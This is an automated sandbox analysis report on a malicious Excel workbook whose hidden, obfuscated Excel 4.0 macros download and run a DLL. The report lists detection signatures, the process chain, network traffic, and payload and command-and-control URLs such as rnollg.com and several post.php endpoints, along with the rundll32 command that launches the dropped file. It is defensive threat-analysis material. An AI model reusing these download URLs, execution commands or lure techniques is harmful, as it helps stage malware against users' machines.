Loading ...

Play interactive tourEdit tour

Analysis Report case (166).xls

Overview

General Information

Sample Name:case (166).xls
Analysis ID:344660
MD5:44b43922e08e0e8e1ec65300b3b1aa74
SHA1:ec1a847009295036381af1b0a4383a61c3dcbb75
SHA256:9b8516fcbe183de0a53ac47ea7f4289176e23fc82da1fe67c70cedc823f5dba6
Tags:xls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Contains functionality to inject code into remote processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found malicious URLs in unpacked macro 4.0 sheet
Found obfuscated Excel 4.0 Macro
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the product ID of Windows
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1252 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2392 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2332 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • msiexec.exe (PID: 1616 cmdline: msiexec.exe MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
case (166).xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1252, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, ProcessId: 2392

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: case (166).xlsVirustotal: Detection: 22%Perma Link
    Source: 5.2.msiexec.exe.90000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2
    Source: 4.2.rundll32.exe.840000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2

    Compliance:

    barindex
    Uses new MSVCR DllsShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Uses secure TLS version for HTTPS connectionsShow sources
    Source: unknownHTTPS traffic detected: 172.67.150.228:443 -> 192.168.2.22:49165 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.44.135:443 -> 192.168.2.22:49166 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.198.109:443 -> 192.168.2.22:49167 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.158.184:443 -> 192.168.2.22:49168 version: TLS 1.2
    Binary contains paths to debug symbolsShow sources
    Source: Binary string: c:\PlanetAllow\OpenRoll\cellNumeral\money.pdb source: msiexec.exe, 00000005.00000003.2161177103.0000000002990000.00000004.00000001.sdmp, scfrd[1].dll.0.dr

    Software Vulnerabilities:

    barindex
    Document exploit detected (creates forbidden files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\formnet.dllJump to behavior
    Document exploit detected (drops PE files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: scfrd[1].dll.0.drJump to dropped file
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then push 0000000Ah
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then mov eax, dword ptr [edi-08h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then add esi, 02h
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then push 00000000h
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then push 0000000Ah
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov eax, dword ptr [edi-08h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then add esi, 02h
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then push 00000000h
    Source: global trafficDNS query: name: rnollg.com
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.150.228:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.150.228:443

    Networking:

    barindex
    Found malicious URLs in unpacked macro 4.0 sheetShow sources
    Source: before.1.0.0.sheet.csv_unpackMacro 4.0 Deobfuscator: https://rnollg.com/kev/scfrd.dll
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00091AF0 InternetReadFile,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
    Source: msiexec.exe, 00000005.00000002.2354459439.0000000000420000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
    Source: rundll32.exe, 00000003.00000002.2156724187.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156276281.0000000002120000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: msiexec.exe, 00000005.00000002.2354459439.0000000000420000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
    Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
    Source: unknownDNS traffic detected: queries for: rnollg.com
    Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpString found in binary or memory: Https://homesoapmolds.com/post.phpZ
    Source: msiexec.exe, 00000005.00000002.2354437908.00000000003FF000.00000004.00000020.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
    Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
    Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
    Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
    Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
    Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
    Source: msiexec.exe, 00000005.00000002.2354494113.000000000047D000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert
    Source: msiexec.exe, 00000005.00000002.2354437908.00000000003FF000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
    Source: msiexec.exe, 00000005.00000002.2354494113.000000000047D000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroo4
    Source: msiexec.exe, 00000005.00000002.2354437908.00000000003FF000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
    Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot202n
    Source: msiexec.exe, 00000005.00000002.2354437908.00000000003FF000.00000004.00000020.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
    Source: msiexec.exe, 00000005.00000002.2354494113.000000000047D000.00000004.00000020.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0K
    Source: rundll32.exe, 00000003.00000002.2156724187.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156276281.0000000002120000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
    Source: rundll32.exe, 00000003.00000002.2156724187.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156276281.0000000002120000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
    Source: rundll32.exe, 00000003.00000002.2156891016.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156420198.0000000002307000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: rundll32.exe, 00000003.00000002.2156891016.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156420198.0000000002307000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
    Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
    Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
    Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
    Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
    Source: msiexec.exe, 00000005.00000002.2354437908.00000000003FF000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0
    Source: msiexec.exe, 00000005.00000002.2354437908.00000000003FF000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
    Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
    Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
    Source: msiexec.exe, 00000005.00000002.2354613249.0000000001F80000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: rundll32.exe, 00000003.00000002.2156891016.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156420198.0000000002307000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: rundll32.exe, 00000003.00000002.2156891016.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156420198.0000000002307000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: A1EE0000.0.drString found in binary or memory: http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)
    Source: case (166).xlsString found in binary or memory: http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~
    Source: msiexec.exe, 00000005.00000002.2354613249.0000000001F80000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
    Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
    Source: msiexec.exe, 00000005.00000002.2354494113.000000000047D000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com/CPS0
    Source: msiexec.exe, 00000005.00000002.2354437908.00000000003FF000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com/CPS0v
    Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
    Source: rundll32.exe, 00000003.00000002.2156724187.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156276281.0000000002120000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: rundll32.exe, 00000003.00000002.2156891016.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156420198.0000000002307000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: rundll32.exe, 00000003.00000002.2156724187.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156276281.0000000002120000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: rundll32.exe, 00000004.00000002.2156276281.0000000002120000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: msiexec.exe, 00000005.00000002.2354459439.0000000000420000.00000004.00000020.sdmpString found in binary or memory: https://gadgetswolf.com/A
    Source: msiexec.exe, 00000005.00000003.2165360506.000000000047D000.00000004.00000001.sdmpString found in binary or memory: https://gadgetswolf.com/post.php
    Source: msiexec.exe, 00000005.00000002.2354459439.0000000000420000.00000004.00000020.sdmpString found in binary or memory: https://gadgetswolf.com/post.phpr
    Source: msiexec.exe, 00000005.00000002.2354459439.0000000000420000.00000004.00000020.sdmpString found in binary or memory: https://gadgetswolf.com/post.phpx
    Source: msiexec.exe, 00000005.00000002.2354459439.0000000000420000.00000004.00000020.sdmpString found in binary or memory: https://gadgetswolf.com/y
    Source: msiexec.exe, 00000005.00000002.2354494113.000000000047D000.00000004.00000020.sdmpString found in binary or memory: https://govemedico.tk/
    Source: msiexec.exe, 00000005.00000002.2354494113.000000000047D000.00000004.00000020.sdmpString found in binary or memory: https://govemedico.tk/O
    Source: msiexec.exe, 00000005.00000002.2354494113.000000000047D000.00000004.00000020.sdmpString found in binary or memory: https://govemedico.tk/post.php
    Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpString found in binary or memory: https://homesoapmolds.com/
    Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpString found in binary or memory: https://homesoapmolds.com/=
    Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpString found in binary or memory: https://homesoapmolds.com/post.php
    Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpString found in binary or memory: https://homesoapmolds.com/post.phpv
    Source: msiexec.exe, 00000005.00000002.2354487031.0000000000468000.00000004.00000020.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
    Source: before.1.0.0.sheet.csv_unpackString found in binary or memory: https://rnollg.com/kev/scfrd.dll
    Source: case (166).xls, A1EE0000.0.drString found in binary or memory: https://rnollg.com/kev/scfrd.dll$8
    Source: msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
    Source: msiexec.exe, 00000005.00000002.2354437908.00000000003FF000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/CPS0
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
    Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
    Source: unknownHTTPS traffic detected: 172.67.150.228:443 -> 192.168.2.22:49165 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.44.135:443 -> 192.168.2.22:49166 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.198.109:443 -> 192.168.2.22:49167 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.158.184:443 -> 192.168.2.22:49168 version: TLS 1.2

    System Summary:

    barindex
    Found malicious Excel 4.0 MacroShow sources
    Source: case (166).xlsInitial sample: URLDownloadToFileA
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Content X E14 - "" jR V \ A B C D E F G H I J K L M N O P Q R S T 1 ' Cjdigicert' 3
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: case (166).xlsInitial sample: CALL
    Source: case (166).xlsInitial sample: CALL
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: case (166).xlsInitial sample: Sheet size: 503434
    Found obfuscated Excel 4.0 MacroShow sources
    Source: case (166).xlsInitial sample: High usage of CHAR() function: 147
    Office process drops PE fileShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\formnet.dllJump to dropped file
    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
    Source: C:\Windows\SysWOW64\msiexec.exeMemory allocated: 76E20000 page execute and read and write
    Source: C:\Windows\SysWOW64\msiexec.exeMemory allocated: 76D20000 page execute and read and write
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00849C60
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00843A30
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00849A60
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0085DA70
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00855BF0
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0090F8FD
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0090D806
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0090D2C4
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0090BB6E
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0090DD48
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00099C60
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00093A30
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00099A60
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000ADA70
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000A5BF0
    Source: egwih.dll.5.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: rundll32.exe, 00000003.00000002.2156724187.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156276281.0000000002120000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
    Source: classification engineClassification label: mal100.expl.evad.winXLS@7/12@4/4
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000A9C90 AdjustTokenPrivileges,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008569A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\A1EE0000Jump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{6564EBFF-51EC-A92E-3E66-73D0C2BEFC46}
    Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{451CDBFF-61EC-8956-3E66-73D0C2BEFC46}
    Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{F5F5D963-6370-39BF-3E66-73D0C2BEFC46}
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD4BC.tmpJump to behavior
    Source: case (166).xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: case (166).xlsVirustotal: Detection: 22%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: c:\PlanetAllow\OpenRoll\cellNumeral\money.pdb source: msiexec.exe, 00000005.00000003.2161177103.0000000002990000.00000004.00000001.sdmp, scfrd[1].dll.0.dr
    Source: case (166).xlsInitial sample: OLE summary lastprinted = 2021-01-26 16:17:13
    Source: case (166).xlsInitial sample: OLE indicators vbamacros = False
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0084D830 LoadLibraryA,GetProcAddress,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0086D1F2 push dword ptr [ecx]; iretd
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0086E9FA push esi; retf
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008682EB push eax; ret
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0086EA51 push esi; retf
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00869A5D push ebp; iretd
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_009093ED push ecx; ret
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0086B56F push esp; ret
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0086B700 push ss; ret
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00922B73 push esi; ret
    Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Ywmiu\egwih.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\formnet.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\formnet.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
